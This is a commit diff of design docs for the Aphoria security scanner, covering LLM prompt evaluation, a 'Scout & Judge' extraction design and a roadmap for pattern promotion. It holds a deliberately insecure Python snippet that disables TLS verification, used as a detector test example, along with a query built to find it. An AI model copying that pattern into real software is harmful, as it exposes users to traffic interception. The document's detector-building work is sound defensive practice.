feat: Aphoria security extractors + LLM evaluation architecture + ontology docs
New security extractors:
- insecure_deserialization, orm_injection, path_traversal, security_headers
- ssrf, unvalidated_redirects, weak_password, xxe
- Enhanced tls_version extractor with comprehensive cipher/protocol checks

Architecture docs:
- Scout-judge extraction pattern for LLM-based code analysis
- LLM prompt evaluation framework
- LLM eval implementation guide

Core improvements:
- stemedb-ontology README and client enhancements
- WAL journal/segment instrumentation
- Signing and ingestion refinements
- Consumer health demo script

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
parent
41c676a78e
commit
bbe6aedc40
@ -40,6 +40,13 @@ Token-efficient fact storage for StemeDB. Query these for quick context without
|
||||
| Phase 6 UAT | `features/phase6-uat.md` | High | 2026-02-02 | Distributed writes UAT results and fixes |
|
||||
| Aphoria Config | `features/aphoria-config.md` | High | 2026-02-04 | Configuration options including hosted mode |
|
||||
|
||||
## Domain Ontology
|
||||
|
||||
| Topic | File | Confidence | Updated | Summary |
|
||||
|-------|------|------------|---------|---------|
|
||||
| Adding a Domain | `../docs/guides/adding-a-domain.md` | High | 2026-02-05 | Step-by-step guide for implementing new domains |
|
||||
| Ontology Crate | `../crates/stemedb-ontology/README.md` | High | 2026-02-05 | Module overview, CLI usage, architecture |
|
||||
|
||||
## Use Cases
|
||||
|
||||
See [use-cases/README.md](../use-cases/README.md) for production scenarios with Postgres Test analysis.
|
||||
|
||||
@ -299,6 +299,22 @@ exclude = ["vendor://acme/internal/*"]
|
||||
- Edge case analysis
|
||||
- Real-world adoption path
|
||||
|
||||
### LLM Extraction Quality
|
||||
|
||||
**Problem:** How do we ensure LLM prompts produce consistent, high-quality extraction results?
|
||||
|
||||
5. **[LLM Prompt Evaluation - Vision](./llm-prompt-evaluation.md)**
|
||||
- Problem statement and enterprise requirements
|
||||
- Architecture overview and core components
|
||||
- Fixture format design
|
||||
- CI/CD integration patterns
|
||||
|
||||
6. **[LLM Prompt Evaluation - Implementation](./llm-eval-implementation.md)** ← START HERE
|
||||
- Actionable implementation spec
|
||||
- Code snippets and file locations
|
||||
- 5-phase implementation plan (11 days)
|
||||
- Seed fixture list
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
@ -307,14 +323,16 @@ exclude = ["vendor://acme/internal/*"]
|
||||
|
||||
| If you need to... | Read this |
|
||||
|-------------------|-----------|
|
||||
| Understand the problem | [Concept Matching Analysis](./concept-matching-analysis.md) |
|
||||
| Implement the solution | [Policy Alias Implementation](./policy-alias-implementation.md) |
|
||||
| Understand concept matching | [Concept Matching Analysis](./concept-matching-analysis.md) |
|
||||
| Implement policy aliases | [Policy Alias Implementation](./policy-alias-implementation.md) |
|
||||
| Understand design philosophy | [Matching Philosophy](./matching-philosophy.md) |
|
||||
| Validate enterprise scenarios | [Enterprise Validation](./enterprise-validation.md) |
|
||||
| Test/evaluate LLM prompts | [LLM Eval Implementation](./llm-eval-implementation.md) |
|
||||
| Add a new extractor | `src/extractors/mod.rs` |
|
||||
| Understand scan flow | `src/scan.rs` |
|
||||
| Modify conflict detection | `src/episteme/conflict.rs` |
|
||||
| Work with Trust Packs | `src/policy.rs`, `src/policy_ops.rs` |
|
||||
| Work with LLM extraction | `src/llm/` |
|
||||
|
||||
---
|
||||
|
||||
@ -364,6 +382,29 @@ exclude = ["vendor://acme/internal/*"]
|
||||
- ✅ Works for RFC/OWASP corpus by design
|
||||
- ⚠️ Breaks for enterprise policies with different hierarchies (solved by AD-001)
|
||||
|
||||
### AD-004: LLM Prompt Evaluation System
|
||||
|
||||
**Status:** Proposed (2026-02-05)
|
||||
|
||||
**Context:** LLM prompts that drive claim extraction are code, but we don't treat them like code. No tests, no metrics, no regression detection. When prompts change, we don't know if quality improved or degraded.
|
||||
|
||||
**Decision:** Build a comprehensive prompt evaluation system with:
|
||||
- Golden corpus of test fixtures with expected outcomes
|
||||
- Observation logging for every extraction
|
||||
- Metrics computation (precision, recall, F1, cost)
|
||||
- Regression detection against baselines
|
||||
- CI integration (smoke tests per-PR, full eval nightly)
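The metrics and regression check listed above can be sketched as follows. This is a minimal illustration, not the evaluation system's actual API: `Counts`, `Metrics`, `compute_metrics`, `is_regression`, and the `tolerance` parameter are all hypothetical names chosen for the example.

```rust
/// Outcome counts from comparing extracted claims against a golden fixture.
/// (Hypothetical type for illustration.)
#[derive(Debug, Clone, Copy)]
pub struct Counts {
    pub true_positives: u32,
    pub false_positives: u32,
    pub false_negatives: u32,
}

/// Quality metrics derived from `Counts`.
#[derive(Debug, Clone, Copy)]
pub struct Metrics {
    pub precision: f64,
    pub recall: f64,
    pub f1: f64,
}

/// Compute precision, recall, and F1. Any ratio with a zero denominator is reported as 0.0.
pub fn compute_metrics(c: Counts) -> Metrics {
    let tp = c.true_positives as f64;
    let ratio = |num: f64, den: f64| if den == 0.0 { 0.0 } else { num / den };
    let precision = ratio(tp, tp + c.false_positives as f64);
    let recall = ratio(tp, tp + c.false_negatives as f64);
    let f1 = ratio(2.0 * precision * recall, precision + recall);
    Metrics { precision, recall, f1 }
}

/// Flag a regression when F1 drops more than `tolerance` below the baseline.
/// (Comparing on F1 alone is an assumption; a real check might compare each metric.)
pub fn is_regression(baseline: &Metrics, current: &Metrics, tolerance: f64) -> bool {
    current.f1 < baseline.f1 - tolerance
}
```

A per-PR smoke test could call `compute_metrics` on a small fixture subset and fail the build when `is_regression` returns `true` against the stored baseline.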
|
||||
|
||||
**Implementation:** See [LLM Prompt Evaluation Spec](./llm-prompt-evaluation.md)
|
||||
|
||||
**Consequences:**
|
||||
- ✅ Prompt changes are validated before deployment
|
||||
- ✅ Regressions are caught automatically
|
||||
- ✅ Quality is measurable over time
|
||||
- ✅ Enterprise confidence in extraction reliability
|
||||
- ⚠️ Requires maintaining golden corpus
|
||||
- ⚠️ Live evaluation has token cost
|
||||
|
||||
---
|
||||
|
||||
## Design Principles
|
||||
@ -396,8 +437,11 @@ Community sharing is opt-in with anonymization enabled by default.
|
||||
- Declarative extractors (user-defined in TOML)
|
||||
- Hosted mode (team aggregation)
|
||||
- Community corpus (anonymous sharing)
|
||||
- LLM-in-the-loop extraction (Gemini semantic claims)
|
||||
- Pattern learning (LLM-extracted patterns remembered)
|
||||
|
||||
### In Progress
|
||||
- **LLM Prompt Evaluation** - Testing, metrics, and regression detection for prompts ([Spec](./llm-prompt-evaluation.md))
|
||||
- **Policy aliases** - Enterprise policy matching via glob patterns ([AD-001](./policy-alias-implementation.md))
|
||||
|
||||
### Planned (Q1 2026)
|
||||
|
||||
1356
applications/aphoria/docs/architecture/llm-eval-implementation.md
Normal file
File diff suppressed because it is too large
1063
applications/aphoria/docs/architecture/llm-prompt-evaluation.md
Normal file
File diff suppressed because it is too large
203
applications/aphoria/docs/architecture/scout-judge-extraction.md
Normal file
@ -0,0 +1,203 @@
|
||||
# Scout & Judge: Hybrid Deterministic-Probabilistic Extraction Architecture
|
||||
|
||||
> **Status:** Proposed (2026-02-05)
|
||||
> **Phase:** 7.9 (Replaces monolithic LLM extraction)
|
||||
> **Context:** Evolution of Phase 7.5 (LLM-in-the-Loop)
|
||||
|
||||
---
|
||||
|
||||
## 1. Problem Statement
|
||||
|
||||
The current LLM extraction pipeline ("Monolithic Mode") treats code files as unstructured text. It feeds entire files to the LLM to find security claims.
|
||||
|
||||
**Issues with Monolithic Mode:**
|
||||
1. **Cost:** Roughly 90% of a typical file is irrelevant to security (imports, UI logic, helpers), yet we pay for every token.
2. **Recall:** LLMs struggle to find "needles in haystacks"; recall degrades as the context grows.
3. **Hallucination:** Irrelevant code confuses the model, leading to false positives.
4. **Latency:** Processing large files is slow and blocking.
|
||||
|
||||
## 2. The Solution: Scout & Judge Architecture
|
||||
|
||||
We decouple the **discovery** of potential claims from the **analysis** of those claims.
|
||||
|
||||
* **The Scout (Deterministic):** Uses Abstract Syntax Trees (AST) via `tree-sitter` to find *Regions of Interest* (ROIs). It runs locally and makes no LLM calls, so it is fast and has no token cost.
|
||||
* **The Judge (Probabilistic):** Uses the LLM to analyze *only* the specific ROI snippet to extract semantic meaning and confidence.
|
||||
|
||||
### Architectural Diagram
|
||||
|
||||
```mermaid
graph TD
    File[Source File] -->|Input| Scout["AST Scout (Tree-sitter)"]

    subgraph "The Scout (Local/Fast)"
        Scout -->|Parse| AST
        AST -->|Query| Query[SCM Queries]
        Query -->|Match| Candidate[Candidate Node]
        Candidate -->|Expand| Snippet[Context Snippet]
    end

    Snippet -->|Input| Judge["LLM Judge (Gemini/Claude)"]

    subgraph "The Judge (Remote/Smart)"
        Judge -->|Prompt: Analyze this specific call| Claims[Structured Claims]
    end

    Claims -->|Output| Aggregator[Claim Aggregator]
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Component Details
|
||||
|
||||
### 3.1 The Scout (Tree-sitter)
|
||||
|
||||
The Scout's job is **High Recall**. It should find *anything* that *might* be relevant. It does not need to be precise.
|
||||
|
||||
**Technology:** `tree-sitter` (Rust bindings)
|
||||
|
||||
**Workflow:**
|
||||
1. **Detect Language:** Identify file type (Python, Go, Rust, JS).
|
||||
2. **Parse:** Generate AST.
|
||||
3. **Query:** Run SCM (S-expression) queries to find patterns.
|
||||
|
||||
**Example Query (Python TLS):**
|
||||
```scm
; tree-sitter-python names call nodes `call` (`call_expression` is the JavaScript name).
(call
  function: (attribute) @func
  arguments: (argument_list
    (keyword_argument
      name: (identifier) @arg_name
      value: (_) @value
    )
  )
  ; The backslash is doubled so the regex engine receives `\.` (a literal dot).
  (#match? @func "requests\\.(get|post|put|delete)")
  (#eq? @arg_name "verify")
)
```
|
||||
|
||||
**Context Expansion:**
|
||||
The Scout doesn't just grab the line. It grabs the **Logical Context**:
|
||||
* The function call itself.
|
||||
* Variable definitions referenced in the call (simple static analysis).
|
||||
* Surrounding 5 lines for comments.
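The "surrounding 5 lines" step can be sketched as a clamped range expansion. This is an illustration under assumptions: `LineRange`, `expand_context`, and `slice_lines` are hypothetical helpers, and line numbers are taken to be 1-based and inclusive.

```rust
/// Inclusive, 1-based line range within a source file. (Hypothetical type.)
#[derive(Debug, PartialEq)]
pub struct LineRange {
    pub start: usize,
    pub end: usize,
}

/// Widen a matched range by `padding` lines on each side, clamped to the file bounds.
pub fn expand_context(matched: &LineRange, total_lines: usize, padding: usize) -> LineRange {
    LineRange {
        start: matched.start.saturating_sub(padding).max(1),
        end: (matched.end + padding).min(total_lines),
    }
}

/// Return the lines of `source` covered by `range`.
pub fn slice_lines<'a>(source: &'a str, range: &LineRange) -> Vec<&'a str> {
    let skip = range.start.saturating_sub(1);
    let take = (range.end + 1).saturating_sub(range.start);
    source.lines().skip(skip).take(take).collect()
}
```

With a padding of 5, a match on line 3 of a 20-line file expands to lines 1 through 8, which picks up a leading comment such as `# Dev override`.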
|
||||
|
||||
### 3.2 The Judge (LLM)
|
||||
|
||||
The Judge's job is **High Precision**. It receives a focused prompt and determines if a claim exists.
|
||||
|
||||
**Input Prompt:**
|
||||
```text
You are a security analyst.
Analyze this code snippet for TLS verification settings.

SNIPPET:
# Dev override
should_verify = False
requests.get(url, verify=should_verify)

CONTEXT:
Variable `should_verify` is defined on line 2.

TASK:
Does this snippet disable TLS verification?
Output JSON: { "subject": "tls/verification", "value": false, "confidence": 0.95 }
```
|
||||
|
||||
**Why this wins:**
|
||||
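* **Token Efficiency:** Input shrinks from ~2,000 tokens (whole file) to ~100 tokens (snippet), a reduction of about 95%.
* **Accuracy:** The model sees only the relevant code, so unrelated code cannot distract it.
* **Speed:** Snippets are independent, so Judge calls can run in parallel.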
|
||||
|
||||
---
|
||||
|
||||
## 4. Implementation Plan
|
||||
|
||||
### Phase 1: Infrastructure (Dependencies)
|
||||
|
||||
Add `tree-sitter` support to `Cargo.toml`.
|
||||
|
||||
```toml
[dependencies]
tree-sitter = "0.20"
tree-sitter-python = "0.20"
tree-sitter-javascript = "0.20"
tree-sitter-go = "0.20"
tree-sitter-rust = "0.20"
```
|
||||
|
||||
### Phase 2: The Scout Engine (`src/scout/`)
|
||||
|
||||
Create a new module `applications/aphoria/src/scout/`.
|
||||
|
||||
* `mod.rs`: Public interface.
|
||||
* `engine.rs`: Orchestrates parsing and querying.
|
||||
* `queries/`: Directory containing `.scm` query files for each category/language.
|
||||
* `python/tls.scm`
|
||||
* `go/sql_injection.scm`
|
||||
|
||||
**Struct definition:**
|
||||
```rust
use std::collections::HashMap;

/// A region of interest found by the Scout and handed to the Judge.
/// `Language` is the crate's existing language enum.
pub struct CandidateSnippet {
    pub file_path: String,
    pub language: Language,
    pub start_line: usize,
    pub end_line: usize,
    pub code: String,
    pub context_variables: HashMap<String, String>, // Name -> Value/Definition
    pub query_id: String, // Which query found this
}
```
|
||||
|
||||
### Phase 3: The Judge Engine (`src/llm/judge.rs`)
|
||||
|
||||
Refactor `LlmExtractor` to support "Judge Mode".
|
||||
|
||||
* Modify `extract()` to accept `CandidateSnippet` instead of full file content.
|
||||
* Create specialized prompts for specific query IDs (e.g., if Scout found a TLS pattern, use the specialized "TLS Judge" prompt, not the generic one).
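Selecting a specialized prompt by query ID might look like the sketch below. The query IDs, the prompt wording, and the functions `prompt_for_query` and `render_judge_prompt` are assumptions made for illustration; they are not the existing `LlmExtractor` interface.

```rust
/// Map a Scout query ID to a specialized Judge instruction.
/// (Hypothetical IDs and wording; unknown IDs fall back to a generic prompt.)
pub fn prompt_for_query(query_id: &str) -> &'static str {
    match query_id {
        "python/tls" => "Analyze this code snippet for TLS verification settings.",
        "go/sql_injection" => "Analyze this code snippet for SQL built from untrusted input.",
        _ => "Analyze this code snippet for security-relevant claims.",
    }
}

/// Assemble the Judge prompt from the snippet code and its resolved variables.
pub fn render_judge_prompt(query_id: &str, code: &str, context: &[(String, String)]) -> String {
    let mut prompt = String::from("You are a security analyst.\n");
    prompt.push_str(prompt_for_query(query_id));
    prompt.push_str("\n\nSNIPPET:\n");
    prompt.push_str(code);
    prompt.push_str("\n\nCONTEXT:\n");
    for (name, definition) in context {
        prompt.push_str(&format!("Variable `{}` is defined as: {}\n", name, definition));
    }
    prompt
}
```

Keeping the per-query instruction in one lookup means a new Scout query only needs one new match arm, and the generic fallback keeps unknown IDs usable.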
|
||||
|
||||
### Phase 4: Integration
|
||||
|
||||
Modify the main `scan` loop:
|
||||
|
||||
1. **Regex Extractors** run first (unchanged).
|
||||
2. **Scout** runs on all files (extremely fast).
|
||||
3. **Deduplicate:** If Scout finds a region already handled by Regex, drop it.
|
||||
4. **Judge:** Send remaining Candidates to LLM.
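The deduplication step (step 3) can be sketched as an overlap filter on line ranges. `Region`, `overlaps`, and `drop_handled` are hypothetical names, and treating any line overlap within the same file as "already handled" is an assumption about the intended rule.

```rust
/// A line range in a file, as reported by either a Regex extractor or the Scout.
/// (Hypothetical type for illustration.)
#[derive(Debug, Clone, PartialEq)]
pub struct Region {
    pub file_path: String,
    pub start_line: usize,
    pub end_line: usize,
}

/// Two regions overlap when they are in the same file and share at least one line.
fn overlaps(a: &Region, b: &Region) -> bool {
    a.file_path == b.file_path && a.start_line <= b.end_line && b.start_line <= a.end_line
}

/// Keep only the Scout candidates that no Regex extractor hit already covers.
pub fn drop_handled(candidates: Vec<Region>, regex_hits: &[Region]) -> Vec<Region> {
    candidates
        .into_iter()
        .filter(|c| !regex_hits.iter().any(|h| overlaps(c, h)))
        .collect()
}
```

Only the regions returned by `drop_handled` would be sent to the Judge, so code already covered by a Regex extractor costs no tokens.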
|
||||
|
||||
---
|
||||
|
||||
## 5. Evaluation & Metrics
|
||||
|
||||
The "Prompt Evaluation System" (Phase 7.8) adapts to this model:
|
||||
|
||||
**1. Scout Evaluation (Deterministic):**
|
||||
* **Metric:** Recall. "Did the Scout find the vulnerable line in `fixtures/tls/bad.py`?"
|
||||
* **Test:** Unit tests using `tree-sitter` queries against code snippets. No LLM required.
|
||||
|
||||
**2. Judge Evaluation (Probabilistic):**
|
||||
* **Metric:** Precision/Accuracy. "Given the snippet, did the LLM classify it correctly?"
|
||||
* **Fixture:** `tests/llm_fixtures` now contains *snippets* derived from the Golden Corpus files.
|
||||
|
||||
**3. Cost Efficiency Metric:**
|
||||
* Track `tokens_per_claim`.
|
||||
* Goal: Reduce tokens/claim by >80% compared to Monolithic approach.
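The cost metric and its target can be expressed as two small functions. This is a sketch: `tokens_per_claim` mirrors the metric name above, while `reduction_percent` and both signatures are assumptions for illustration.

```rust
/// Average tokens spent per extracted claim; `None` when no claims were produced.
pub fn tokens_per_claim(total_tokens: u64, claims: u64) -> Option<f64> {
    if claims == 0 {
        None
    } else {
        Some(total_tokens as f64 / claims as f64)
    }
}

/// Percentage reduction in tokens/claim relative to the Monolithic baseline.
/// Returns `None` when the baseline is not positive.
pub fn reduction_percent(monolithic: f64, scout_judge: f64) -> Option<f64> {
    if monolithic <= 0.0 {
        None
    } else {
        Some((1.0 - scout_judge / monolithic) * 100.0)
    }
}
```

Using the illustrative figures from section 3.2 (about 2,000 tokens per file versus about 100 per snippet, one claim each), the reduction is about 95%, which clears the >80% goal.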
|
||||
|
||||
## 6. Migration Strategy
|
||||
|
||||
1. **Parallel Run:** Run Scout logic alongside Regex logic in "shadow mode" (logging only) to tune queries.
|
||||
2. **Incremental Rollout:** Enable Scout & Judge for **one category** (e.g., TLS) while the other categories stay on Regex extractors, or on Monolithic mode where it is still in use.
|
||||
3. **Full Switch:** Deprecate "Monolithic Mode" prompts.
|
||||
|
||||
---
|
||||
|
||||
## 7. Comparison Summary
|
||||
|
||||
| Feature | Current (Monolithic) | Scout & Judge (Proposed) |
|
||||
| :--- | :--- | :--- |
|
||||
| **Trigger** | File name heuristic | AST Pattern Match |
|
||||
| **Input** | Whole File | Relevant Snippet |
|
||||
| **Context** | Noisy (imports, unrelated code) | Focused (local scope) |
|
||||
| **Cost** | $$$ (Linear to file size) | ¢ (Linear to *relevant* code) |
|
||||
| **Reliability** | Low (Lost in middle) | High (Forced focus) |
|
||||
| **Maintenance** | Prompt Engineering | Query Engineering + Simple Prompts |
|
||||
|
||||
@ -1142,7 +1142,7 @@ auto_promote = false # Require human approval (Phase 7.7)
|
||||
|
||||
---
|
||||
|
||||
## Phase 7.7: Pattern → Extractor Promotion ⬜
|
||||
## Phase 7.7: Pattern → Extractor Promotion ✅
|
||||
|
||||
> High-frequency learned patterns get promoted to declarative extractors. This closes the learning loop: patterns discovered by LLM become permanent, fast regex extractors.
|
||||
|
||||
@ -1162,15 +1162,17 @@ Human review (optional) → Approve/Reject
|
||||
Merge to project's .aphoria/extractors/
|
||||
```
|
||||
|
||||
### 7.7.1 Promotion Pipeline ⬜
|
||||
### 7.7.1 Promotion Pipeline ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Candidate selection | Query patterns meeting threshold |
|
||||
| Regex generation | LLM generates regex from examples |
|
||||
| YAML generation | Convert to declarative extractor format |
|
||||
| Validation | Test against all stored examples |
|
||||
| Review queue | Present candidates for human approval |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `PromotionPipeline` | ✅ `promotion/pipeline.rs` — orchestrates full promotion flow |
|
||||
| `RegexGenerator` | ✅ `promotion/regex_gen.rs` — Gemini LLM integration |
|
||||
| `ExtractorValidator` | ✅ `promotion/validator.rs` — ReDoS detection, timing validation |
|
||||
| `YamlWriter` | ✅ `promotion/writer.rs` — outputs to `.aphoria/extractors/learned/` |
|
||||
| `InteractiveReviewer` | ✅ `promotion/review.rs` — CLI review workflow |
|
||||
| `PromotionCandidate` | ✅ `promotion/types.rs` |
|
||||
| `ValidationResult` | ✅ `promotion/types.rs` |
|
||||
|
||||
```rust
|
||||
pub struct PromotionPipeline {
|
||||
@ -1216,13 +1218,13 @@ impl PromotionPipeline {
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.2 Regex Generation ⬜
|
||||
### 7.7.2 Regex Generation ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Multi-example prompt | Include all examples in generation prompt |
|
||||
| Regex safety | Prevent catastrophic backtracking |
|
||||
| Test coverage | Generate test cases alongside regex |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Multi-example prompt | ✅ Includes all examples in generation prompt |
|
||||
| Regex safety | ✅ ReDoS detection prevents catastrophic backtracking |
|
||||
| Test coverage | ✅ Validates against stored examples |
|
||||
|
||||
```rust
|
||||
async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<String> {
|
||||
@ -1244,14 +1246,14 @@ async fn generate_regex(examples: &[String], claim: &ClaimTemplate) -> Result<St
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.3 Validation Suite ⬜
|
||||
### 7.7.3 Validation Suite ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| Positive tests | Must match all stored examples |
|
||||
| Negative tests | Must NOT match known-safe code |
|
||||
| Performance test | Must complete in < 100ms |
|
||||
| False positive check | Run against sample codebase |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| Positive tests | ✅ Must match all stored examples |
|
||||
| ReDoS detection | ✅ Detects catastrophic backtracking patterns |
|
||||
| Performance test | ✅ Timing validation with configurable threshold |
|
||||
| False positive check | ⬜ Deferred to Phase 9 (sample codebase FP testing) |
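One common way to flag catastrophic-backtracking risk is to look for nested unbounded quantifiers such as `(a+)+`. The sketch below illustrates that heuristic only; it is not the logic in `promotion/validator.rs`, and `has_nested_quantifier` is a hypothetical name. It ignores bounded repeats like `{2,}` and other ReDoS shapes such as overlapping alternations.

```rust
/// Heuristic: return true if a group that contains `+` or `*` is itself
/// repeated with `+` or `*`, e.g. `(a+)+` or `((a*)b)*`.
pub fn has_nested_quantifier(pattern: &str) -> bool {
    // One flag per open group: has an unbounded quantifier been seen inside it?
    let mut groups: Vec<bool> = Vec::new();
    let mut in_class = false;
    let mut chars = pattern.chars().peekable();

    while let Some(c) = chars.next() {
        if c == '\\' {
            // Skip the escaped character so `\(` or `\+` is not misread.
            chars.next();
            continue;
        }
        if in_class {
            // Inside `[...]`, `+`, `*`, and parentheses are literals.
            if c == ']' {
                in_class = false;
            }
            continue;
        }
        match c {
            '[' => in_class = true,
            '(' => groups.push(false),
            ')' => {
                let inner = groups.pop().unwrap_or(false);
                let repeated = matches!(chars.peek().copied(), Some('+') | Some('*'));
                if inner && repeated {
                    return true;
                }
                // A quantifier inside this group also counts for the enclosing group.
                if let Some(outer) = groups.last_mut() {
                    *outer = *outer || inner;
                }
            }
            '+' | '*' => {
                if let Some(current) = groups.last_mut() {
                    *current = true;
                }
            }
            _ => {}
        }
    }
    false
}
```

A validator could reject a generated regex when this returns `true` and still apply a timing check afterwards, since a syntactic heuristic cannot catch every slow pattern.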
|
||||
|
||||
```rust
|
||||
pub struct ExtractorValidator {
|
||||
@ -1292,14 +1294,17 @@ impl ExtractorValidator {
|
||||
}
|
||||
```
|
||||
|
||||
### 7.7.4 Human Review Gate ⬜
|
||||
### 7.7.4 Human Review Gate ✅
|
||||
|
||||
| Task | Description |
|
||||
|------|-------------|
|
||||
| `aphoria extractors review` | CLI to review pending promotions |
|
||||
| Approval workflow | Approve, reject, or request changes |
|
||||
| Rejection tracking | Record why patterns were rejected |
|
||||
| Auto-approve mode | Skip review for >0.95 confidence (Phase 9) |
|
||||
| Task | Status |
|
||||
|------|--------|
|
||||
| `aphoria extractors review` | ✅ CLI to review pending promotions |
|
||||
| `aphoria extractors stats` | ✅ Show pattern store statistics |
|
||||
| `aphoria extractors candidates` | ✅ List promotion candidates |
|
||||
| `aphoria extractors promote` | ✅ Promote pattern to extractor |
|
||||
| Approval workflow | ✅ Approve, reject, or skip via InteractiveReviewer |
|
||||
| Rejection tracking | ⬜ Deferred to Phase 9 (rejection reason persistence) |
|
||||
| Auto-approve mode | ⬜ Deferred to Phase 9 (>0.95 confidence auto-promote) |
|
||||
|
||||
```bash
|
||||
$ aphoria extractors review
|
||||
@ -1320,9 +1325,9 @@ Pending promotions: 3
|
||||
[a]pprove [r]eject [e]dit [s]kip [q]uit: _
|
||||
```
|
||||
|
||||
### 7.7.5 Extractor Output ⬜
|
||||
### 7.7.5 Extractor Output ✅
|
||||
|
||||
Promoted patterns become declarative extractors in `.aphoria/extractors/`:
|
||||
Promoted patterns become declarative extractors in `.aphoria/extractors/learned/`:
|
||||
|
||||
```yaml
|
||||
# .aphoria/extractors/learned/tls_min_version_const.yaml
|
||||
@ -1348,7 +1353,7 @@ metadata:
|
||||
confidence: 0.91
|
||||
```
|
||||
|
||||
### 7.7.6 Configuration ⬜
|
||||
### 7.7.6 Configuration ✅
|
||||
|
||||
```toml
|
||||
# aphoria.toml
|
||||
@ -1357,14 +1362,13 @@ enabled = true # Enable promotion pipeline
|
||||
auto_promote = false # Require human approval
|
||||
output_dir = ".aphoria/extractors/learned"
|
||||
min_confidence = 0.8 # Minimum to consider
|
||||
min_projects = 5 # Projects needed before promotion
|
||||
require_validation = true # Must pass validation suite
|
||||
|
||||
[promotion.review]
|
||||
notify = "slack://webhook/..." # Notify when candidates ready
|
||||
batch_size = 10 # Max candidates per review session
|
||||
```
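Thresholds like `min_confidence` and `min_projects` could drive candidate selection roughly as follows. This is a sketch under assumptions: `PromotionConfig`, `LearnedPattern`, and `select_candidates` are hypothetical stand-ins, not the types in `promotion/types.rs`.

```rust
/// Subset of the promotion settings used for candidate selection. (Hypothetical type.)
pub struct PromotionConfig {
    pub min_confidence: f64,
    pub min_projects: u32,
}

/// A learned pattern with its aggregate statistics. (Hypothetical type.)
pub struct LearnedPattern {
    pub id: String,
    pub confidence: f64,
    pub project_count: u32,
}

/// Return the patterns that meet both thresholds and may enter the promotion pipeline.
pub fn select_candidates<'a>(
    patterns: &'a [LearnedPattern],
    cfg: &PromotionConfig,
) -> Vec<&'a LearnedPattern> {
    patterns
        .iter()
        .filter(|p| p.confidence >= cfg.min_confidence && p.project_count >= cfg.min_projects)
        .collect()
}
```

With `min_confidence = 0.8` and `min_projects = 5`, a pattern at confidence 0.91 seen in 7 projects qualifies, while one seen in only 2 projects does not, whatever its confidence.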
|
||||
|
||||
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`
|
||||
**Files:** `promotion/mod.rs`, `promotion/pipeline.rs`, `promotion/regex_gen.rs`, `promotion/validator.rs`, `promotion/review.rs`, `promotion/writer.rs`, `promotion/types.rs`, `handlers/extractors.rs`
|
||||
|
||||
**Tests:** 43 tests covering pipeline, validation, regex generation, and YAML output.
|
||||
|
||||
---
|
||||
|
||||
@ -1549,14 +1553,14 @@ contribute_patterns = true # Share patterns to community
|
||||
| 7 | Declarative Extractors | Phase 6 | ✅ |
|
||||
| **7.5** | **LLM-in-the-Loop Extraction (Gemini)** | Phase 7 | ✅ |
|
||||
| **7.6** | **Pattern Learning Store** | Phase 7.5 | ✅ |
|
||||
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ⬜ |
|
||||
| **7.7** | **Pattern → Extractor Promotion** | Phase 7.6 | ✅ |
|
||||
| 8 | Enterprise Extractors (MVP: 8.1, 8.6, 8.11) | Phase 7.5 | ✅ |
|
||||
| **9** | **Autonomous Extractor Generation** | Phase 8 | ⬜ |
|
||||
|
||||
**Current state:**
|
||||
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 8 (MVP) complete (clippy clean)
|
||||
- Phases 0-3, 4.5, 4A-4E, 5, 5.6, 6, 7, 7.5, 7.6, 7.7, 8 (MVP) complete (clippy clean)
|
||||
- Full corpus: RFC, OWASP, Vendor sources
|
||||
- 17 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies)
|
||||
- 25 extractors including security (weak_crypto, command_injection, sql_injection, high_entropy_secrets, auth_bypass, insecure_cookies, path_traversal, unvalidated_redirects, weak_password, security_headers, insecure_deserialization, ssrf, orm_injection, xxe)
|
||||
- Trust Packs: signed policy bundles with import/export
|
||||
- Ephemeral mode: 40x faster for CI
|
||||
- Observation write-back: `--sync` records novel claims as Tier 4 project memory
|
||||
@ -1567,10 +1571,11 @@ contribute_patterns = true # Share patterns to community
|
||||
- Community Corpus: Opt-in anonymous pattern sharing with privacy-preserving anonymization
|
||||
- Declarative Extractors: TOML-defined custom extractors without Rust code
|
||||
- LLM Extraction: Gemini-powered semantic claim extraction for high-value files
|
||||
- Enterprise Extractors MVP: High-entropy secrets (Shannon entropy), auth bypass patterns, insecure cookie flags
|
||||
- Enterprise Extractors: High-entropy secrets, auth bypass, insecure cookies, path traversal, unvalidated redirects, weak passwords, security headers, insecure deserialization, SSRF, ORM injection, XXE
|
||||
- Pattern Learning: LLM-extracted claims recorded for promotion to declarative extractors
|
||||
- Pattern Promotion: CLI workflow to promote learned patterns to declarative extractors with Gemini regex generation and validation
|
||||
|
||||
**Next:** Phase 7.7 → 8 (full) → 9 (Self-Learning Extraction System)
|
||||
**Next:** Phase 8 (full) → 9 (Self-Learning Extraction System)
|
||||
|
||||
### The Self-Learning Vision
|
||||
|
||||
@ -1581,11 +1586,11 @@ Phase 7.5: LLM-in-the-Loop (Gemini semantic extraction) ✅ COMPLETE
|
||||
↓
|
||||
Phase 7.6: Pattern Learning (remember what LLM finds) ✅ COMPLETE
|
||||
↓
|
||||
Phase 7.7: Pattern Promotion (patterns → extractors) ⬜ NEXT
|
||||
Phase 7.7: Pattern Promotion (patterns → extractors) ✅ COMPLETE
|
||||
↓
|
||||
Phase 8: Enterprise Extractors (generated + curated) ✅ MVP (8.1, 8.6, 8.11)
|
||||
↓
|
||||
Phase 9: Autonomous Generation (fully self-improving) ⬜
|
||||
Phase 9: Autonomous Generation (fully self-improving) ⬜ NEXT
|
||||
```
|
||||
|
||||
**The endgame:** Every PR teaches Aphoria. After a month, it knows your security patterns better than your team does.
|
||||
